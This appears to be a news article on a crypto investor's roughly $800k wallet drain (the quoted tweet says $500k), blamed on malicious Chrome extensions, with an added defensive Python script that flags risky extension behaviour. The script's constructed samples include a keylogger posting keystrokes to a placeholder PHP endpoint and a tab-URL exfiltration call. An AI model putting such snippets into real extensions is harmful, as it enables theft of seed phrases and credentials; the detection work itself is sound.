A crypto investor posting as Sell When Over took to Twitter to walk through how an attacker drained $800k from his crypto wallets inside a 46-hour window. The most likely root cause is a pair of malicious Chrome extensions that were installed without his knowledge, with a deferred Chrome update or undetected malware on the PC as the suspected entry point.

The Unraveling of Security Layers

Sell When Over recounted deferring a Chrome update until a subsequent Windows update forced a restart. After the restart Chrome behaved differently straight away: his open tabs were gone and his extensions had been logged out. That prompted him to re-import his wallet seed phrases on the affected PC, reading them carefully from a secondary, uncompromised device.

Just realized I got $500k drained from multiple wallet apps 46 hours ago. Think I got extension attacked, with two suspicious extensions that appeared on my chrome browser. Does not feel good fam. Still investigating.

— Sell When Over | 9000.sei (@sell9000) April 8, 2024

The real tell came afterwards: two extensions he had never installed, “Sync Test Beta” and “Simple Game,” had appeared in Chrome, and the browser had started offering automatic Korean translation unprompted. Tellingly, the one wallet app whose seed he had not re-imported was untouched, which points to a single compromised PC and to the re-import itself as the moment the seed phrases were captured.

Inspecting the two extensions confirmed the suspicion. “Sync Test Beta,” a garishly colored extension, turned out to be a keylogger that quietly posted captured keystrokes to an external PHP script; “Simple Game” appeared to monitor browser tab activity. An extension that runs a content script on every page sees whatever is typed into a wallet’s import form, seed phrase included, which is consistent with the drain following the re-import. In hindsight, Sell When Over said, the right move would have been a full PC wipe at the first sign of anything odd, especially when the oddities coincide with a major update such as Chrome’s UI overhaul.
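The behaviour described above can be caught with a quick triage of each extension’s manifest and scripts before anything sensitive is typed into the browser. The Python script below is an added example written for this page; it is not tooling from Sell When Over or from the investigation. The three sample extensions inside it are constructed to mimic the behaviour the article describes (an all-sites keylogging content script posting to a PHP endpoint, a tab watcher, and a harmless theme) and use hypothetical names, a TEST-NET address and a reserved example domain; they are not the real “Sync Test Beta” or “Simple Game” code. The script flags risky permissions, content scripts injected into every site, manifests without the Chrome Web Store update URL, keyboard hooks, and outbound endpoints.

```python
# Heuristic triage of Chrome extensions: manifest permissions plus script contents.
# Added example for this page, not code from the original post or the investigation.
import json
import re
from pathlib import Path
from typing import Dict, List

# Permissions that matter when a wallet or exchange is used in the same browser.
RISKY_PERMISSIONS = {
    "tabs": "can read the URL and title of every open tab",
    "webRequest": "can observe every HTTP request the browser makes",
    "cookies": "can read session cookies for hosts it has access to",
    "clipboardRead": "can read the clipboard, where seed phrases get pasted",
    "scripting": "can inject script into pages at runtime",
    "webNavigation": "can track navigation across tabs",
}
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# Packages installed from the Chrome Web Store carry this update_url in their manifest.
WEBSTORE_UPDATE_URL = "https://clients2.google.com/service/update2/crx"

KEY_HOOK_RE = re.compile(r"addEventListener\(\s*['\"]key(?:down|press|up)['\"]")
URL_RE = re.compile(r"https?://[^\s'\"`)]+")


def triage_manifest(manifest: Dict) -> List[str]:
    """Return findings for one parsed manifest.json (MV2 and MV3 layouts)."""
    findings = []
    perms = {p for p in manifest.get("permissions", []) if isinstance(p, str)}
    for p in sorted(perms & set(RISKY_PERMISSIONS)):
        findings.append(f"permission '{p}': {RISKY_PERMISSIONS[p]}")
    for cs in manifest.get("content_scripts", []):
        if BROAD_HOSTS & set(cs.get("matches", [])):
            when = " at document_start" if cs.get("run_at") == "document_start" else ""
            findings.append(f"content script runs on every site{when}: "
                            "it sees whatever is typed into wallet import forms and logins")
    if manifest.get("update_url") != WEBSTORE_UPDATE_URL:
        findings.append("no Chrome Web Store update_url: sideloaded or developer-mode install")
    return findings


def triage_script(source: str) -> List[str]:
    """Flag keyboard hooks and outbound endpoints in one JavaScript file."""
    findings = []
    if KEY_HOOK_RE.search(source):
        findings.append("hooks keyboard events (keylogger pattern)")
    for url in sorted(set(URL_RE.findall(source))):
        kind = "script endpoint" if url.lower().endswith(".php") else "endpoint"
        findings.append(f"contacts external {kind}: {url}")
    return findings


def load_extension_dir(path: Path) -> Dict:
    """Read manifest.json and every .js file from an unpacked extension version directory."""
    manifest = json.loads((path / "manifest.json").read_text(encoding="utf-8"))
    scripts = {p.name: p.read_text(encoding="utf-8", errors="replace") for p in path.rglob("*.js")}
    return {"manifest": manifest, "scripts": scripts}


# Constructed samples (hypothetical names, TEST-NET address, reserved example domain).
SAMPLE_EXTENSIONS = {
    "Sync Helper (constructed)": {
        "manifest": {
            "manifest_version": 3, "name": "Sync Helper",
            "permissions": ["storage", "clipboardRead"],
            "host_permissions": ["<all_urls>"],
            "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"],
                                 "run_at": "document_start"}],
        },
        "scripts": {"content.js": (
            "let buf='';document.addEventListener('keydown',e=>{buf+=e.key;"
            "if(buf.length>64){fetch('http://198.51.100.7/collect.php',"
            "{method:'POST',body:buf});buf='';}});")},
    },
    "Tab Game (constructed)": {
        "manifest": {"manifest_version": 3, "name": "Tab Game",
                     "permissions": ["tabs", "storage"], "update_url": WEBSTORE_UPDATE_URL,
                     "background": {"service_worker": "bg.js"}},
        "scripts": {"bg.js": "chrome.tabs.onUpdated.addListener((id,info,tab)=>{fetch("
                             "'https://example.net/t',{method:'POST',body:tab.url});});"},
    },
    "Dark Theme (constructed)": {
        "manifest": {"manifest_version": 3, "name": "Dark Theme", "permissions": [],
                     "update_url": WEBSTORE_UPDATE_URL},
        "scripts": {},
    },
}


def run_triage(extensions: Dict = SAMPLE_EXTENSIONS) -> Dict[str, List[str]]:
    """Map each extension name to its findings; an empty list means nothing was flagged."""
    report = {}
    for name, ext in extensions.items():
        findings = triage_manifest(ext["manifest"])
        for fname, src in ext["scripts"].items():
            findings += [f"{fname}: {f}" for f in triage_script(src)]
        report[name] = findings
    return report


if __name__ == "__main__":
    for name, findings in run_triage().items():
        print(f"{name}: {'clean' if not findings else ''}")
        for f in findings:
            print("   -", f)
```

To run it against a real Windows profile, feed `load_extension_dir` each version directory under `%LOCALAPPDATA%\Google\Chrome\User Data\Default\Extensions\<id>\<version>` and pass the resulting dict to `run_triage`. The checks are heuristics: a legitimate password manager also hooks keyboard events and runs on every site, so a hit means “read this one by hand,” not “malicious.”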

A Costly Lesson in Digital Vigilance

As the thread grew, Sell When Over disclosed a further lapse: a login to his Google account from an unrecognised Windows device, possibly using a device name that mimicked one of his own so the alert would not stand out. The login was traced to a VPS hosted by Kaopu Cloud, a provider with a reputation in hacker circles for hosting abusive activity. 2FA was enabled on the account, yet the attacker got in anyway; the exact method, whether OAuth phishing, cross-site scripting or something else, remains speculation. Two general points bear on this. Chrome sync installs extensions on every device signed into the same Google account, so a compromised account is one way for an extension to appear without any local install. And a malicious extension already running inside the browser sits past the login step altogether: it operates within sessions that have already completed 2FA, so a second factor does nothing against it.

The incident was a hard lesson, and Sell When Over shared several takeaways:

  1. Disappointment that Bitdefender detected nothing, whereas Malwarebytes did flag the threat.

  2. A warning against complacency about security, however much or little crypto is involved.

  3. Stern advice never to enter seed phrases under any pretext; set up a fresh system instead.

  4. Abandoning Chrome for browsers he considers more secure, such as Brave.

  5. Device segregation: keep a dedicated machine for crypto transactions and nothing else.

  6. Regular checks of Google account activity alerts.

  7. Disabling extension syncing, especially on any device set aside for crypto.

  8. An acknowledgment that 2FA has limits.

  9. Routine security audits and procedural updates to surface threats that would otherwise sit unnoticed.

Sell When Over added that his hardware wallet was untouched and dismissed suggestions that the disclosure was a cover for tax evasion. Although part of the stolen funds had already started moving through laundering channels, he offered a $150k bounty for their return and said he was considering a bounty-funded forensic investigation.

The thread ended on a call for continued vigilance, with particular criticism of Google’s decision to group security alerts into a single email thread, which can bury a new sign-in notice among old ones and may have kept the intrusion from being noticed sooner.